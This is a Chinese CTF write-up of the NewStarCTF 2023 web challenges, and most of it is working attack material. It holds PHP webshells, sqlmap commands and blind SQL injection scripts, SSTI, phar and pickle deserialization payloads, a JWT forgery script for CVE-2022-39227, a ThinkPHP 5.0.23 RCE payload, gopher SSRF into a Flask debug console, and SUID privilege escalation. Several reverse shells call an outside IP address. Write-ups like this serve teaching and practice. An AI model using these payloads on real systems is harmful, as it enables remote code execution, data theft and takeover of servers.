NewStarCTF 2023 公开赛道 Web

赛道 Web"/>

NewStarCTF 2023 公开赛道 Web

NewStarCTF 2023 公开赛道 Web

WEEK1|WEB

泄漏的秘密

泄露的秘密，直接看常见的目录robots.txt,www.zip直接那道两段flag

也可以用dirsearch工具扫描，但是BUUOJ平台的网站只能开底线程，不然全是429

PART ONE: flag{r0bots_1s_s0_us3ful
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

上传一个a.png的文件，这个网站只有前端进行了验证，后端没有验证，直接改文件名绕过就行了

马的内容:

<?php eval($_GET['1']); ?>

:81/upload/a.php?1=system(%27cat%20/fllll4g%27);

flag{633c24ea-5073-4a09-a505-286895382fa5}

Begin of HTTP

考的http协议相关请求头的知识

GET /?ctf=1
POST secret=n3wst4rCTF2023g00000d
User-Agent: NewStarCTF2023
Cookie: power=ctfer
X-Real-IP: 127.0.0.1

flag{a3ca8c6d-1854-45fb-9ea5-1da1e1fecdc2}

ErrorFlask

python的网站开启了debug模式，我们给number1,number2传入字符即可产生报错，直接找debug信息里面找flag

Begin of PHP

这个直接用数组全部绕过了

:81/?key1[]=1&key2[]=2&key4[]=1&key5[]=132123

key3[]=1&flag5=+

这里有一个extract($_POST);函数，这个函数是进行变量覆盖的作用

extract函数:

/

flag{dcb78c60-38b4-4328-b191-f95faadac253}

WEEK2|WEB

R!C!E!

第一直接脚本爆破

找到数字为114514

import hashlib
target_string = 'c4d038'
def md5_last5(string):# 计算字符串的md5散列值md5_hash = hashlib.md5(string.encode()).hexdigest()# 截取前面6位字符last_5 = md5_hash[:6]  # md_hash[-6:]是后6位return last_5
# 114514
for j in range(1,9999999999):i = str(j)print(md5_last5(i))if(md5_last5(i)==target_string):print(i)break

直接亦或无参数绕过

password=114514&e[v.a.l=("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%03%01%08%00%00%06%00"^"%60%60%7c%20%2f%60%2a");

PHP变量流量层面WAF绕过

PHP 7.3.4 在FPM模式下运行:

变量名和值会进行url解码:

以解析$_GET变量为例，大致流程为：获取请求字符串-->获取分割符&-->使用=分割key和value。
在解析key和value时，会分别对其进行url解码，关键代码如下：
if (val) { /* have a value */size_t val_len;size_t new_val_len;*val++ = '\0';// 对key进行url解码php_url_decode(var, strlen(var));// 对value进行url解码val_len = php_url_decode(val, strlen(val));val = estrndup(val, val_len);if (sapi_module.input_filter(arg, var, &val, val_len, &new_val_len)) {php_register_variable_safe(var, val, new_val_len, &array);}efree(val);}

变量名截断:

我们知道00在C语言中意味着字符串的结尾，其编码为%00。
在对key进行url解码之后，%00转换为00而截断了key字符串。
但是对value进行url解码的时候，获取了其返回值val_len，即字符串长度，后续注册变量时，也是使用val_len进行内存中的操作，所以未能截断value的值

变量名之前的空格会被忽略

URL 不能包含空格。URL 编码通常使用 + 来替换空格
使用%20替换空格
在注册变量时，PHP会对变量名进行判断，丢弃变量名前的空格，关键代码如下：
while (*var_name==' ') {var_name++;}

变量名的空格和.会转化为_:

首先明确一个问题，PHP的变量名中是不能包含点号的。 但是为了处理表单中的点号命名，PHP就会自动把点号.转换成下划线_。
这个转换的过程也是发生在PHP变量的注册过程中，关键代码如下：
/* ensure that we don't have spaces or dots in the variable name (not binary safe) */for (p = var; *p; p++) {if (*p == ' ' || *p == '.') {*p='_';} else if (*p == '[') {is_array = 1;ip = p;*p = 0;break;}}

变量名的[会转换为_:

这个转换过程与.的转换过程不同。PHP在遇到[符号时，会认为变量为数组。后续进行数组处理时，如果未能找到与[匹配的]，则会将[替换为.。关键代码如下：
ip = strchr(ip, ']');if (!ip) {/* PHP variables cannot contain '[' in their names, so we replace the character with a '_' */*(index_s - 1) = '_';index_len = 0;if (index) {index_len = strlen(index);}goto plain_var;return;}

Z1d10t师傅浇我的:

/post/8bc42760.html?highlight=%E4%B8%8B%E5%88%92%E7%BA%BF

只有第一个字符为[时 后面的非法字符才不会被转为下划线

在这里还剽窃到一个新姿势：

读文件可以用more来绕过

还有一种通配符是[]可以匹配指定范围中的任意字符 那么 f和g就可以用[e-h]来绕过

a是字母表第一个，该怎么绕过呢，我们可以构造[非数字]形式:[^0-9] 这里尖括号就是排除匹配范围，这也就可以包含所有字母 来达到获取a的效果了

md5碰撞:

fuck%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00O%EC%28%FE%D4%C2%22%FA%40Lx%CFC%3CqMx%975%EA%0F%B7Tq%28.%7F%26%D7%8A2%F8%EC%08%BC%E9%60j%0B%DA%CF%05%40q%C2%DDa7%D0%40%C6i%97%10l%84%9D%BA%7FK%7E%FEq%A6%3F%E4%5Dl%06%7F%7F%0A%05%F6%DB%EDQ%ED%28%3D%CEhjj%15%FC%A0X%C1%1B%F5%CC%CD0%5D%A2%F5P%17%03.%8Crb%93%83%C0%EF%C2AF%88%DC%97%A0%85%CF%DA%A2G%F6%D7%0Cw%0E%A3%94%9Bfuck%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00O%EC%28%FE%D4%C2%22%FA%40Lx%CFC%3CqMx%975j%0F%B7Tq%28.%7F%26%D7%8A2%F8%EC%08%BC%E9%60j%0B%DA%CF%05%40q%C2%5Db7%D0%40%C6i%97%10l%84%9D%BA%7F%CB%7E%FEq%A6%3F%E4%5Dl%06%7F%7F%0A%05%F6%DB%EDQ%ED%28%3D%CEhj%EA%15%FC%A0X%C1%1B%F5%CC%CD0%5D%A2%F5P%17%03.%8Crb%93%83%C0%EF%C2%C1E%88%DC%97%A0%85%CF%DA%A2G%F6%D7%0C%F7%0E%A3%94%9B

flag{c8a0f34a-c88f-4879-ae81-64c8fcaece2a}

Unserialize？

这个简单的php，绕过正则就行，找不到wp了，这题绕过方法应该挺多的

EasyLogin

用弱口令直接爆密码为000000，然后抓重定向302的包就可以拿到flag了

flag{961a0630-c1b9-41b8-b330-248674981617}

游戏高手

游戏高手这题简单，直接查找源码，然后修改分数就行

ez_sql

这题一分钟sql注入直接跑

sqlmap -u :81/?id=TMP11503 --dbssqlmap -u :81/?id=TMP11503 -D ctf -T --clomnssqlmap -u :81/?id=TMP11503 -D ctf -tablessqlmap -u :81/?id=TMP11503 -D ctf -T here_is_flag --clomnssqlmap -u :81/?id=TMP11503 -D ctf -T here_is_flag --columnssqlmap -u :81/?id=TMP11503 -D ctf -T here_is_flag -C "flag" --dump

Upload again!

这个是appache服务器，这题上传.htaccess配置文件就可以了，把站下面所有的文件解析为php

然后上传一个图片就ok了

GIF89a
<script language='php'>eval($_REQUEST[1]);</script>

WEEK3|WEB

Include 🍐

考点pearcmd

?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=@eval($_POST[1]);?>+/tmp/test.php

用BP打包，用BP发包，用BP发包！！

Hackbar和url都会自动的进行一次url编码

?file=/tmp/test

直接拿shell了

R!!!C!!!E!!!

此题利用\来转义绕过，然后通过管道符把读取的内容写在根目录下，然后我们直接访问写到根目录下的文件就行

<?php
highlight_file(__FILE__);class Begin{public $name;public function __destruct(){if(preg_match("/[a-zA-Z0-9]/",$this->name)){echo "Hello";}else{echo "Welcome to NewStarCTF 2023!";}}
}class Then{private $func;public function __toString(){($this->func)();return "Good Job!";}}class Handle{protected $obj;public function __call($func, $vars){$this->obj->end();}}class Super{protected $obj;public function __invoke(){$this->obj->getStr();}public function end(){die("==GAME OVER==");}
}class CTF{public $handle;public function end(){unset($this->handle->log);}}class WhiteGod{public $func;public $var;public function __unset($var){($this->func)($this->var);    }
}$a = new minipop;
$a->qwejaskdjnlka = new minipop;
$a->qwejaskdjnlka->code = "cat /flag_is_h3eeere|te\\e /var/www/html/2";
echo serialize($a);

POP Gadget

pop链子:

<?php
class Begin{public $name;
}
class Then{private $func;public function __construct(){$this->func = new Super();}
}
class Handle{protected $obj;public function __construct(){$this->obj = new CTF();}
}
class Super{protected $obj;public function __construct(){$this->obj = new Handle();}
}
class CTF{public $handle;public function __construct(){$this->handle = new WhiteGod();}}
class WhiteGod{public $func = 'system';public $var = 'cat /flag';
}
$a = new Begin();
$a->name = new Then();
echo urlencode(serialize($a));

medium_sql

写的二分盲注脚本:

import requests
import time
url = ':81/'
result=''
for i in range(1,50):low=31high=127mid = (low+high)//2while low<=high:paylaod = "TMP0929'And/**/0^(Ascii(Substr((Select(flag)from(ctf.here_is_flag)),{},1))>{})%23".format(i,mid)#爆库爆数据语句差不多 关键字被ban大写绕过就行r = requests.get(url+"?id="+paylaod)if ("English" in r.text):low = mid+1mid = (low+high)//2else:high = mid-1mid = (low+high)//2result+=chr(high+1)time.sleep(0.3)print(result)

GenShin

不太会ssti，喜欢当脚本小子

docker run --net host -it marven11/fenjing webui 

payload:

{'name': '{%print(((g.pop.__globals__.__builtins__.__import__("os")["p""open"]("cat /flag")).read()))%}'}，表单为{'action': '/secr3tofpop', 'method': 'GET', 'inputs': {'name'}}

OtenkiGirl

这题看到有一个原型链污染的路由/submit

看到这里有个提示

Remove test data from before the movie was released
删除测试之前的数据

所以我们的flag可能就在我们之前的时间里面，所以我们构造payload污染时间即可

这题关键信息在这，我们可以看到，查询语句这里最后where主要的判断是 timestamp>=所以，我们只需要改变timestamp的值即可,看上下文，如果我们想要改变这个值的话，我们需要污染min_public_time时间尽量小

async function getInfo(timestamp) {timestamp = typeof timestamp === "number" ? timestamp : Date.now();// Remove test data from before the movie was releasedlet minTimestamp = new Date(CONFIG.min_public_time || DEFAULT_CONFIG.min_public_time).getTime();timestamp = Math.max(timestamp, minTimestamp);const data = await sql.all(`SELECT wishid, date, place, contact, reason, timestamp FROM wishes WHERE timestamp >= ?`, [timestamp]).catch(e => { throw e });return data;
}

然后我们直接上payload打就行

{"date":"1","place":"1","contact":"1","reason":"1","timestamp":1698317269591,"__proto__":{"min_public_time":"2019-07-09"}
}

这题主要需要仔细，需要你明白整个程序的逻辑，明白出题人想让你污染什么，

Week4|WEB

逃

考点：

php反序列化字符串逃逸

经典反序列化逃逸

/?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:7:"cat /f*";}

直接打就行

More Fast

考点：

1.GC回收机制

考了一个GUCI回收机制，直接秒了

 <?php
highlight_file(__FILE__);class Start{public $errMsg;public function __destruct() {die($this->errMsg);}
}class Pwn{public $obj;public function __invoke(){$this->obj->evil();}public function evil() {phpinfo();  //}
}class Reverse{public $func;public function __get($var) {($this->func)();  //}
}class Web{public $func;public $var;public function evil() {if(!preg_match("/flag/i",$this->var)){($this->func)($this->var);  //}else{echo "Not Flag";}}
}class Crypto{public $obj;public function __toString() {$wel = $this->obj->good;  //return "NewStar";}
}class Misc{public function evil() {echo "good job but nothing";}
}//$c = @unserialize($_POST['fast']);
//throw new Exception("Nope");
$a = new Start;
$a->errMsg = new Crypto;
$a->errMsg->obj = new Reverse;
$a->errMsg->obj->func = new Pwn;
$a->errMsg->obj->func->obj = new Web;
$a->errMsg->obj->func->obj->func = system;
$a->errMsg->obj->func->obj->var = "cat /f*";
$b = array($a,NULL);
echo serialize($b);

PharOne

这题是phar反序列化

fopen() unlink() stat() fstat() fseek() rename() opendir() rmdir() mkdir() file_put_contents() file_get_contents() 
file_exists() fileinode() include() require() include_once require_once() filemtime() fileowner() fileperms() 
filesize() is_dir() scandir() rmdir() highlight_file()
//外加一个类
new DirectoryIteartor()

这些函数都能触发phar反序列化

源码分析发现有个unlink函数

 <?php
highlight_file(__FILE__);
class Flag{public $cmd;public function __destruct(){@exec($this->cmd);}
}
@unlink($_POST['file']); 

写脚本生成phar包

<?php
class Flag{public $cmd;
}
$a =new Flag();
$a->cmd = "bash -c 'sh -i &>/dev/tcp/36.139.110.159/7777 0>&1'";
$phar = new Phar('1.phar');  # 生成的phar
$phar->stopBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); # 
$phar-> setMetadata($a);  # 写入反序列化的内容
$phar -> addFromString('1.txt','1'); # 添加压缩的内容
$phar->stopBuffering();  # 计算标签
?>

然后发现过滤了__HALT_COMPILER

用gzip命令绕过过滤就行

gzip 1.phar

然后还对文件头进行了限定文件后缀,改文件后缀即可

file=phar://upload/26a529ffa3ed210b7fa7c584a7ee4c33.png/1.phar

反弹shell成功，结束

flask disk

考点：

1.文件上传导致覆盖getshell

直接上传一个app.py文件，直接弹shell

因为上传app.py会覆盖之前的文件，所以我们就可以getshell了

后面预期解法看到了file.save会覆盖已存在的文件

import osos.system("bash -c \"bash -i >& /dev/tcp/36.139.110.159/7777 0>&1\"")

from flask import Flask,request,send_file
import os,datetime
app = Flask(__name__)@app.route('/',methods=['GET'])
def index():return '<h1>Welcome to my flask disk</h1><a href="/list">list files</a><br><a href="/upload">upload files</a><br><a href="/console">admin manage</a>'@app.route('/list',methods=['GET'])
def list():dirs = os.listdir('.')items = ''for dir in dirs:if os.path.isfile(dir):create_time = int(os.path.getctime(dir))create_time = datetime.datetime.fromtimestamp(create_time)item =f'</pre>{dir}  {str(os.path.getsize(dir))}b  {create_time}</pre><br><br>'items += itemitems += '\n'return items@app.route('/upload',methods=['GET','POST'])
def upload():if request.method == 'GET':s='<form action="/upload" method="POST" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" value="Upload"></form>'return selif request.method == 'POST':file = request.files['file']if '..' in file.filename or '/' in file.filename:return '.. and / are not allowed!'file.save(file.filename)return 'upload success. <a href="/list">check</a>'@app.route('/download',methods=['GET','POST'])
def download():filename = request.args.get('filename')if filename and os.path.exists(filename):if '..' in filename or '/' in filename:return '.. and / are not allowed!'return send_file(filename,as_attachment=True)else:return 'no file to download or file not exist'if __name__=='__main__':app.run(host='0.0.0.0',debug=True,port=5000)

下载出来的源码

midsql

这题延时严重

import requests
# from tqdm import trange
res = ''
last = ' '
headers = {'Host': '1ae3a3ec-d220-4c01-87b7-6987c878cd74.node4.buuoj:81','Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','Referer': ':81','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9'
}
for i in range(1, 1000):for j in range(127, 31, -1):url = r':81/?id='# payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))>{j}),sleep(3),0)' # information_schema,mysql,performance_schema,sys,test,ctf# payload = rf'1/**/and/**/if((ascii(substr((select/**/database()),{i},1))>{j}),sleep(3),0)'# payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/"ctf"),{i},1))>{j}),sleep(3),0)'# payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"items"),{i},1))>{j}),sleep(3),0)' # id,name,price# payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(price)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'# payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(id,0x3a,name,0x3a,price)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'payload = rf'1/**/and/**/if((ascii(substr((select/**/group_concat(name)/**/from/**/ctf.items),{i},1))>{j}),sleep(4),0)'url = url + payload# print(url)try:response = requests.get(url=url, timeout=4)except Exception as e:last = res# print(chr(j+1))res += chr(j+1)# print(res)breakprint('[*] ' + res)

Week5|WEB

Unserialize Again

非预期解法：

这题应该是被非预期了,直接根目录下写🐎就行了

/pairing.php?pear=/var/www/html/a.php&apple=<?php eval($_POST[1]); ?>

猜测预期解是打phar吧

预期解法：

pppython?

考点：

1.计算pin🐎

2.ssrf

3.利用pin🐎算cookie

第一步发现有个ssrf接口，先绕过前面几步

这题用到一个技巧是手算cookie

计算pin🐎还是哪些老步骤了

我这里用的是工具来计算的cookie

得用gopher协议来打，实现rce，脚本：

import urllib.parse
import urllib.requestcmd = 'whoami'
s = "KsDz7oqmCrFx5nOp8vKz"
host = "127.0.0.1:1314"
# cookie = "__wzddde03e10368497982792=1698651626|c9f35062072d"
pin = "113-575-700"
poc = f"""GET http://127.0.0.1:1314/console?&__debugger__=yes&pin={pin}&cmd={cmd}&frm=0&s={s} HTTP/1.1
Host: {host}
Connection: close
"""new_poc = urllib.parse.quote(poc).replace('%0A', '%0D%0A')
res = f'gopher://{host}/_' + new_poc
print(urllib.parse.quote(res))

最终的payload:

/?url=gopher%3A//127.0.0.1%3A1314/_GET%2520/console%253F%2526__debugger__%253Dyes%2526cmd%253D__import__%2528%252522os%252522%2529.popen%2528%252522bash%252520-c%252520%25255C%252522bash%252520-i%252520%25253E%252526%252520%25252Fdev%25252Ftcp%25252F36.139.110.159%25252F7777%252520%25253C%2525261%25255C%252522%252522%2529%2526frm%253D0%2526s%253DZinxRVqfynmCiJZQaF9j%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A1314%250D%250AConnection%253A%2520close%250D%250ACookie%253A%2520__wzd734478c6106a1a37ad92%253D1698655413%257Caa64bc59c8d3%250D%250A&lolita[]=1

Ye’s Pickle

这题看了看源码，随机数比较大不能爆破，开了debug报错源码中看到了secret不知道有什么用

参考链接:

.py

(webfun CVE-2022-39227)

考点:

1.pickle反序列化

2.CVE-2022-39227

from datetime import timedelta
from json import loads, dumps
# from common import generated_keys
import python_jwt as jwt
from pyvows import Vows, expect
from jwcryptomon import base64url_decode, base64url_encodedef topic(topic):""" Use mix of JSON and compact format to insert forged claims including long expiration """[header, payload, signature] = topic.split('.')parsed_payload = loads(base64url_decode(payload))print(parsed_payload)parsed_payload['role'] = "admin"print(parsed_payload)fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))print (header+ '.' +fake_payload+ '.' +signature)# print (header+ '.' + payload+ '.' +signature)a = header+ '.' +fake_payload+ '.' +signature# print(q)return '{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'originaltoken = '''eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTg3NjQ0NzYsImlhdCI6MTY5ODc2MDg3NiwianRpIjoiWUN1WXdmLWFFSFVhNmNRWnlkclRFdyIsIm5iZiI6MTY5ODc2MDg3Niwicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.aYoTc0VuYSWMrV3qYyVY0rIODjBUTGwcNxun4s6Hx5lbhl0IqrT7LJm9ORJe6bDLO9rdtu2W6yBMVTay9LOM6BojGekMAL4CNZrGYKpg0twIYz9ptCp83y-1lfh6Dwoa_JY27jEQUlSNWBsJqJ-0USKhJ4OCReR1OtPwxFPAZRAuzBFzRh93pr9ePt663upc38rorgx6njKcEwzQmBoHICEak3wOJNSBykEsKAQ6-cf44y_9GsKPTBe4PzQR2ba6Q6HiKjRwHMP3q-mrxBIttQqPqhtiKOxzZgzt3BBFCDrrS5neRseQC_b5Og6s2e2hWNnCI0C-BvE0j5Djjd1Cnw'''
topic = topic(originaltoken)
print(topic)

伪造jwt成功，用这个session直接打pickle反序列化，后面的反序列化就简单了

/?token=KGNvcwpzeXN0ZW0KUydiYXNoIC1jICdzaCAtaSAmPi9kZXYvdGNwLzM2LjEzOS4xMTAuMTU5Lzc3NzcgMD4mMScnCm8u

直接服务器上拿flag就结束了

Final

Thinkphp 5.0.23框架的一个远程rce漏洞

/index.php?s=captcha&test=-1_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

出现配置文件，存在远程rce漏洞，disable_function只禁用了system函数

1/index.php?s=captcha_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKTsgPz5iYg== | base64 -d > index.php

改一改payload写一句话木马上传，发现没有权限可以读flag。

我们就在上传一个反弹shell的文件上去，访问它就可以反弹shell了

bash -c 'sh -i &>/dev/tcp/36.xxx.xxx.159/7777 0>&1'

反弹shell成功,然后发现没有权限读文件

find / -user root -perm -4000 -print 2>/dev/null
/bin/cp
/bin/mount
/bin/su
/bin/umount
## 来到根目录下
cp ./flag_dd3f6380aa0d /etc/passwd
cat /etc/passwd
flag{abc80326-d717-4013-b22c-1d705360a6b3}

NextDrive

逻辑漏洞

看hint了解秒传的原理:

发现test.res.http文件里面有返回包，没有响应包（而且有个标签好像是Yours，太懒了不重新打开看了)，于是我们想办法用秒传原理链接到test.res.http文件，然后利用秒传的逻辑漏洞，上传一个任意文件改掉hash值和test.res.http相同即可，发现里面有token和uid进行身份伪造

看share.js文件

const Router = require("koa-router");
const router = new Router();
const CONFIG = require("../../runtime.config.json");
const Res = require("../../components/utils/response");
const FileSignUtil = require("../../components/utils/file-signature");
const { DriveUtil } = require("../../components/utils/database.utilities");
const fs = require("fs");
const path = require("path");
const { verifySession } = require("../../components/utils/session");
const logger = global.logger;/*** @deprecated* ! FIXME: 发现漏洞，请进行修改*/
router.get("/s/:hashfn", async (ctx, next) => {const hash_fn = String(ctx.params.hashfn || '')const hash = hash_fn.slice(0, 64)const from_uid = ctx.query.from_uidconst custom_fn = ctx.query.fn// 参数校验if (typeof hash_fn !== "string" || typeof from_uid !== "string") {// invalid params or queryctx.set("X-Error-Reason", "Invalid Params");ctx.status = 400; // Bad Requestreturn ctx.res.end();}// 是否为共享的文件let IS_FILE_EXIST = await DriveUtil.isShareFileExist(hash, from_uid)if (!IS_FILE_EXIST) {ctx.set("X-Error-Reason", "File Not Found");ctx.status = 404; // Not Foundreturn ctx.res.end();}// 系统中是否存储有该文件let IS_FILE_EXIST_IN_STORAGEtry {IS_FILE_EXIST_IN_STORAGE = fs.existsSync(path.resolve(CONFIG.storage_path, hash_fn))} catch (e) {ctx.set("X-Error-Reason", "Internal Server Error");ctx.status = 500; // Internal Server Errorreturn ctx.res.end();}if (!IS_FILE_EXIST_IN_STORAGE) {logger.error(`File ${hash_fn.yellow} not found in storage, but exist in database!`)ctx.set("X-Error-Reason", "Internal Server Error");ctx.status = 500; // Internal Server Errorreturn ctx.res.end();}// 文件名处理let filename = typeof custom_fn === "string" ? custom_fn : (await DriveUtil.getFilename(from_uid, hash));filename = filename.replace(/[\\\/\:\*\"\'\<\>\|\?\x00-\x1F\x7F]/gi, "_")// 发送ctx.set("Content-Disposition", `attachment; filename*=UTF-8''${encodeURIComponent(filename)}`);// ctx.body = fs.createReadStream(path.resolve(CONFIG.storage_path, hash_fn))await ctx.sendFile(path.resolve(CONFIG.storage_path, hash_fn)).catch(e => {logger.error(`Error while sending file ${hash_fn.yellow}`)logger.error(e)ctx.status = 500; // Internal Server Errorreturn ctx.res.end();})
})module.exports = router;

看来share.js文件，只需绕过前面的几个判断就行，然后目录穿越，再控制fn=/proc/self/environ就行

最终payload:

/s/98d69972f5fa8ac77185170ec3128ea18fbd5be187e88596bbd321fbd65b79f0/../../../../../proc/self/environ?from_uid=100000&fn=/proc/self/environ 

4-复盘

为了做这题我首先去做了

MISC：

week2-1-序章

手撸flag（ex

you_w4nt_s3cretflag{just_w4rm_up_s0_you_n3ed_h4rder_6026cd32}

然后我以为可能和sql注入相关，然后写了一共烂的脚本，发现注入不出来，我测试了sql语句发现不行，看了源码中的sql.ini（疑惑

这个flag应该不对，重新看index.php，发现有个文件包含函数可以用，直接打pearcmd写shell到根目录下

/index.php?+config-create+/&page=/../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_GET[1])?>+/var/www/html/a.php

读flag发现不行，没有权限，弹shell进行suid提权

find / -user root -perm -4000 -print 2>/dev/nul
## 没找到有suid权限的命令，然后到/bin目录下一个个看，发现有gzip
-rwsr-xr-x 1 root root     59976 Jun 17  2021 passwd
-rwsr-xr-x 1 root root     55680 Oct 27  2021 su
-rwsr-xr-x 1 root root     93424 Oct  7  2021 gzip可以用,回到根目录
gzip -g flag -t

本题就结束了